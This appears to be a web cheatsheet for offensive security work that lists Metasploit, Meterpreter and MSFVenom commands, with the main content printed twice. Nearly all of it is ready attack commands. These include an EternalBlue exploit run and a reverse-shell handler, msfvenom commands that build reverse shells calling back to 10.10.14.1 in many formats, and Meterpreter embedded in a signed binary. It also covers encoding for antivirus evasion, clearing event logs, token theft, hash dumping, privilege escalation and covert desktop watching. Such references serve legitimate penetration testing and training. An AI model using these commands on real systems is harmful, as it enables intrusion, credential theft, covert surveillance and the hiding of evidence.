Playbook - Quick Reference Cheatsheets for Offensive Security Practitioners

#Getting Started

Launch Metasploit

Basic

msfconsole

Quiet Start (No Banner)

msfconsole -q

start with a resouce script

msfconsole -r file.rc

Common Commands

search <term>                # Search for a module
use <module_path>            # Use a module
info                         # Show module info
show options / show payloads # Show module config
set <OPTION> <VALUE>         # Set module option
setg <OPTION> <VALUE>        # Set global option
unsetg <OPTION>              # Unset global option
run / exploit                # Execute module
exploit -j -z                # Run in bg w/o session
check                        # Test if target is vulnerable
creds                        # List all credentials in the database

Handling Sessions & Jobs

List all sessions

sessions -l

Connect to a session

sessions <id>

Kill a session

sessions -k <id>

List all running jobs

jobs -l

Kill Specified Job

jobs -k <id>

Module Types

Type	Purpose
exploit	Launch attack
payload	Code delivered to target
auxiliary	Scanners, fuzzers, etc
post	Post-exploit modules
encoder	Obfuscate payloads
evasion	AV bypass tools
nop	Payload padding

Start a Exploit Handler

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST <local_ip>

set LPORT <port>

run -j                       # -j backgrounds the handler

Running an exploit

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_https  

set rhost <target_IP>

#if required

set rport <target_port> 

exploit

Common Exploit Functions

Command	Description
`check`	check to see if a target is vulnerable
`rcheck`	reloads the module and checks if the target is vulnerable
`rerun`	Alias for rexploit
`exploit`	Launch an exploit attempt
`run`	Alias for exploit

Notes:

check allows ranges to be noted instead of setting an rhost

check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255

#Meterpreter

Core Commands on Session

Get System Info

sysinfo

Get user context

getuid

Get Process List

ps

Migrate to new Process

migrate <pid>

Open a system shell (i.e bash/cmd.exe)

shell

Exit the session

exit

Background the session

background

# Or

bg

File System Commands

Get Current Target Working Directory

pwd

cd # Change Directory

Get Current Local Working Directory

lpwd

lcd # Change Directory

List Files

ls

Transfer Files

# Target to Local
Download <file>

# Local to Target
Upload <file>

View Contents of File

cat <file>

Edit Contents of File In-Line

edit <file>

System Commands (Windows Focused)

Get the PID Meterpreter is running as

getpid

Run a program "hidden"

execute -f <exe> -H

Clear all Application/System/Security Event Logs

# Requires NT/System. Not OPSEC Safe
clearenv

Shutdown or Reboot Target

reboot

shutdown

Route Commands

List All Routes

route

Add Remove A Route

route [add/remove] <subnet> <netmask>

Delete all routes

route flush

Collection

Take a Screenshot of the desktop

screenshot

Creeper Mode: Watch the desktop

screenshare

Privleges

Steal Impersonation Token

steal_token

Release active impersonation tokens

drop_token

Attempt to Privlege Escalation

getprivs

Attempt to Automate Privlege Escalation using Exploits

getsystem

Attempt to Dump SAM Database

hashdump

#MSFVenom

Switches

Option	Description
`-p`	Payload
`-f`	Format (`exe`, `elf`, `raw`)
`-o`	Output file
`-a`	Architecture (`x86`, `x64`)
`--platform`	Platform (`windows`, `linux`)
`-b`	Bad chars (`\x00\x0a`)
`-e`	Encoder
`-i`	Encoding iterations
`-x`	Template file (exe)
`-s`	Max size
`--help-formats`	List all formats

Basic Usage

Basic form to create an EXE

msfvenom -p <payload> LHOST=<listening ip> LPORT=<port> -f exe -o shell.exe

Example

msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f elf > bind.elf

To get Raw Shellcode for Shellcode Runners

msfvenom -p<payload> LHOST=<listening ip> LPORT=<port> -f c

Example Windows Payloads

Standard Reverse Shell EXE on x64 arch

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -o shell.exe

Stageless Meterpreter Reverse (LARGE FILE)

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -o shell.exe

Embed Meterpreter into an Existing Signed Binary

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -x signed.exe -k -f exe -o evil_signed.exe

Example Linux Payloads

Reverse shell ELF (x86)

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f elf > shell.elf

Reverse Shell Bash script (payload as command)

msfvenom -p cmd/unix/reverse_bash LHOST=10.10.14.1 LPORT=9001 -f raw

Example Web Payloads

PHP reverse shell

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f raw -o shell.php

ASP reverse shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f asp > shell.asp

Example Script Payloads

Python Rev Shell

msfvenom -p python/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f raw > shell.py

Powershell Rev Shell

msfvenom -p windows/powershell_reverse_tcp LHOST=10.10.14.1 LPORT=9001 -f psh-cmd

Evasion and Obfuscation

Encoding with shikata_ga_nai (3 iterations)

# \ is a line escape in bash allows for continual entry after new line
#NOTE: Does not work on Win 11
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=10.10.14.1 LPORT=4444 \
-e x86/shikata_ga_nai -i 3 -f exe -o enc_shell.exe

Avoiding Bad Characters

msfvenom -p windows/shell_reverse_tcp \
LHOST=10.10.14.1 LPORT=4444 \
-b '\x00\x0a\x0d' -f exe -o no_badchars.exe

Pad The Payload with NOPS

# -n is nops the number denotes how many nops you want
msfvenom -p windows/shell_reverse_tcp \
LHOST=10.10.14.1 LPORT=4444 \
-n 16 -f exe > nop_shell.exe

#Getting Started

Launch Metasploit

Basic

msfconsole

Quiet Start (No Banner)

msfconsole -q

start with a resouce script

msfconsole -r file.rc

Common Commands

search <term>                # Search for a module
use <module_path>            # Use a module
info                         # Show module info
show options / show payloads # Show module config
set <OPTION> <VALUE>         # Set module option
setg <OPTION> <VALUE>        # Set global option
unsetg <OPTION>              # Unset global option
run / exploit                # Execute module
exploit -j -z                # Run in bg w/o session
check                        # Test if target is vulnerable
creds                        # List all credentials in the database

Handling Sessions & Jobs

List all sessions

sessions -l

Connect to a session

sessions <id>

Kill a session

sessions -k <id>

List all running jobs

jobs -l

Kill Specified Job

jobs -k <id>

Module Types

Type	Purpose
exploit	Launch attack
payload	Code delivered to target
auxiliary	Scanners, fuzzers, etc
post	Post-exploit modules
encoder	Obfuscate payloads
evasion	AV bypass tools
nop	Payload padding

Start a Exploit Handler

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST <local_ip>

set LPORT <port>

run -j                       # -j backgrounds the handler

Running an exploit

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_https  

set rhost <target_IP>

#if required

set rport <target_port> 

exploit

Common Exploit Functions

Command	Description
`check`	check to see if a target is vulnerable
`rcheck`	reloads the module and checks if the target is vulnerable
`rerun`	Alias for rexploit
`exploit`	Launch an exploit attempt
`run`	Alias for exploit

Notes:

check allows ranges to be noted instead of setting an rhost

check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255

#Meterpreter

Core Commands on Session

Get System Info

sysinfo

Get user context

getuid

Get Process List

ps

Migrate to new Process

migrate <pid>

Open a system shell (i.e bash/cmd.exe)

shell

Exit the session

exit

Background the session

background

# Or

bg

File System Commands

Get Current Target Working Directory

pwd

cd # Change Directory

Get Current Local Working Directory

lpwd

lcd # Change Directory

List Files

ls

Transfer Files

# Target to Local
Download <file>

# Local to Target
Upload <file>

View Contents of File

cat <file>

Edit Contents of File In-Line

edit <file>

System Commands (Windows Focused)

Get the PID Meterpreter is running as

getpid

Run a program "hidden"

execute -f <exe> -H

Clear all Application/System/Security Event Logs

# Requires NT/System. Not OPSEC Safe
clearenv

Shutdown or Reboot Target

reboot

shutdown

Route Commands

List All Routes

route

Add Remove A Route

route [add/remove] <subnet> <netmask>

Delete all routes

route flush

Collection

Take a Screenshot of the desktop

screenshot

Creeper Mode: Watch the desktop

screenshare

Privleges

Steal Impersonation Token

steal_token

Release active impersonation tokens

drop_token

Attempt to Privlege Escalation

getprivs

Attempt to Automate Privlege Escalation using Exploits

getsystem

Attempt to Dump SAM Database

hashdump

#MSFVenom

Switches

Option	Description
`-p`	Payload
`-f`	Format (`exe`, `elf`, `raw`)
`-o`	Output file
`-a`	Architecture (`x86`, `x64`)
`--platform`	Platform (`windows`, `linux`)
`-b`	Bad chars (`\x00\x0a`)
`-e`	Encoder
`-i`	Encoding iterations
`-x`	Template file (exe)
`-s`	Max size
`--help-formats`	List all formats

Basic Usage

Basic form to create an EXE

msfvenom -p <payload> LHOST=<listening ip> LPORT=<port> -f exe -o shell.exe

Example

msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f elf > bind.elf

To get Raw Shellcode for Shellcode Runners

msfvenom -p<payload> LHOST=<listening ip> LPORT=<port> -f c

Example Windows Payloads

Standard Reverse Shell EXE on x64 arch

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -o shell.exe

Stageless Meterpreter Reverse (LARGE FILE)

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -o shell.exe

Embed Meterpreter into an Existing Signed Binary

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -x signed.exe -k -f exe -o evil_signed.exe

Example Linux Payloads

Reverse shell ELF (x86)

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f elf > shell.elf

Reverse Shell Bash script (payload as command)

msfvenom -p cmd/unix/reverse_bash LHOST=10.10.14.1 LPORT=9001 -f raw

Example Web Payloads

PHP reverse shell

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f raw -o shell.php

ASP reverse shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f asp > shell.asp

Example Script Payloads

Python Rev Shell

msfvenom -p python/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f raw > shell.py

Powershell Rev Shell

msfvenom -p windows/powershell_reverse_tcp LHOST=10.10.14.1 LPORT=9001 -f psh-cmd

Evasion and Obfuscation

Encoding with shikata_ga_nai (3 iterations)

# \ is a line escape in bash allows for continual entry after new line
#NOTE: Does not work on Win 11
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=10.10.14.1 LPORT=4444 \
-e x86/shikata_ga_nai -i 3 -f exe -o enc_shell.exe

Avoiding Bad Characters

msfvenom -p windows/shell_reverse_tcp \
LHOST=10.10.14.1 LPORT=4444 \
-b '\x00\x0a\x0d' -f exe -o no_badchars.exe

Pad The Payload with NOPS

# -n is nops the number denotes how many nops you want
msfvenom -p windows/shell_reverse_tcp \
LHOST=10.10.14.1 LPORT=4444 \
-n 16 -f exe > nop_shell.exe

Metasploit cheatsheet

#Getting Started

#Meterpreter

#MSFVenom

Bash

Code Execution

Credential Access

Sandbox Detection/Evasion (Windows)

Shellcode Runners

Metasploit

The Briefing Room

EC Github

Playbook Github

Metasploit cheatsheet

#Getting Started

#Meterpreter

#MSFVenom

Bash

Code Execution

Credential Access

Sandbox Detection/Evasion (Windows)

Shellcode Runners

Metasploit

The Briefing Room

EC Github

Playbook Github